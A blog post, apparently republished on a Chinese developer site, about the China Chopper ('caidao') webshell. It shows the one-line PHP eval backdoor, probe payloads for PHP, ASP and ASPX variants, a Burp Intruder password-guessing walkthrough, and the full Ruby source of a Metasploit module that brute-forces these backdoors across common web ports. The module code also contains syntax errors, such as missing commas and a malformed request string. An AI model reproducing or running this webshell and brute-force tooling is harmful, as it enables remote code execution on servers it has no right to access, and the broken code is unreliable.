.backdoor.php,Metasploit - crack chinese caidao php backdoor

最新推荐文章于 2021-10-26 21:49:58 发布

TrungTPhan

最新推荐文章于 2021-10-26 21:49:58 发布

阅读量340

点赞数

文章标签： .backdoor.php

Backdoor Request

PHP Backdoor: <?php @eval($_POST["OP"]);?>

HTTP Request:

POST /bk.php

....

op=phpinfo();

If it's successful, phpinfo page will show us.

ASP Backdoor:

HTTP Request:

POST /bk.asp

op=execute("response.write(""woo""):response.write(Len(""admin"")):response.write(""woo""):response. end")

If it's successful, 'woo5woo' page will show us.

ASPX Backdoor:

HTTP Request:

POST /bk.aspx

op=Response.Write("woo");Response.Write(1+4);Response.Write("woo")

If it's successful, 'woo5woo' page will show us.

Crack a php backdoor

For Example, we will crack caidao php backdoor step by step.

1. We create a html login form to learn how to use php backdoor.

Press the lable called "Click Here", we will see HTTP request in burpsuite.

send it to intruder, and make "adminadmin" as a intruder variable.

Bingo ! The password is 'adminadmin'. Now we can do it with metasploit as follow.

Crack backdoors with metasploit

# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient

include Msf::Auxiliary::Scanner

include Msf::Auxiliary::AuthBrute

def initialize(info = {})

super(update_info(info,

'Name' => 'Chinese Caidao Backdoor Bruteforce',

'Description' => 'This module attempts to brute chinese caidao php/asp/aspx backdoor.',

'Author' => [ 'Nixawk' ],

'References' =>

[

[ 'URL', 'http://blog.csdn.net/nixawk/article/details/40430329']

'License' => MSF_LICENSE

))

register_options([

OptEnum.new('TYPE', [ true, "backdoor type", "PHP", ["PHP", "ASP", "ASPX"] ]),

OptBool.new('VERBOSE', [ false, 'Enable detailed status messages', false ])

OptString.new('TARGETURI', [ true, "The URI to authenticate against", "/backdoor.php" ])

], self.class)

register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ])

end

def backdoor_brute(uri, user, pass, payload, match)

begin

data = "&user=#{user}{pass}=#{payload}"

res = send_request_cgi({

'uri' => uri,

'method' => "POST",

'data' => "#{data}"

})

rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEOUT

print_error("#{peer} - Service failed to respond")

return :abort

end

print_status("#{peer} - brute force caidao password: \"#{pass}\"")

if res and res.code == 200 and res.body =~ /#{match}/mi

print_good("#{peer} - Successful login: password - \"#{pass}\"")

return :next_user

end

return

end

def run_host(ip)

uri = normalize_uri(target_uri.path)

script_type = datastore['TYPE']

junk = Rex::Text::rand_text_alphanumeric(4)

match = "#{junk}4#{junk}"

case script_type

when /php$/mi

payload = "$_=\"4\";echo \"#{junk}\".$_.\"#{junk}\";";

when /asp$/mi

payload = "execute(\"response.write(\"\"#{junk}\"\"):response.write(Len(\"\"#{junk}\"\")):response.write(\"\"#{junk}\"\"):response.end\")"

when /aspx$/mi

payload = "Response.Write(\"#{junk}\");Response.Write(Len(\"#{junk}\")});Response.Write(\"#{junk}\")"

else

print_error("#{peer} - Backddor type is not support")

return

end

each_user_pass { |user, pass|

backdoor_brute(uri, user, pass, payload, match)

}

end

TrungTPhan

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
.backdoor.php,Metasploit - crack chinese caidao php backdoor

Backdoor RequestPHP Backdoor: HTTP Request:POST /bk.php....op=phpinfo();If it's successful, phpinfo page will show us.ASP Backdoor:HTTP Request:POST /bk.aspop=execute("response.write(""woo""):resp...
复制链接

扫一扫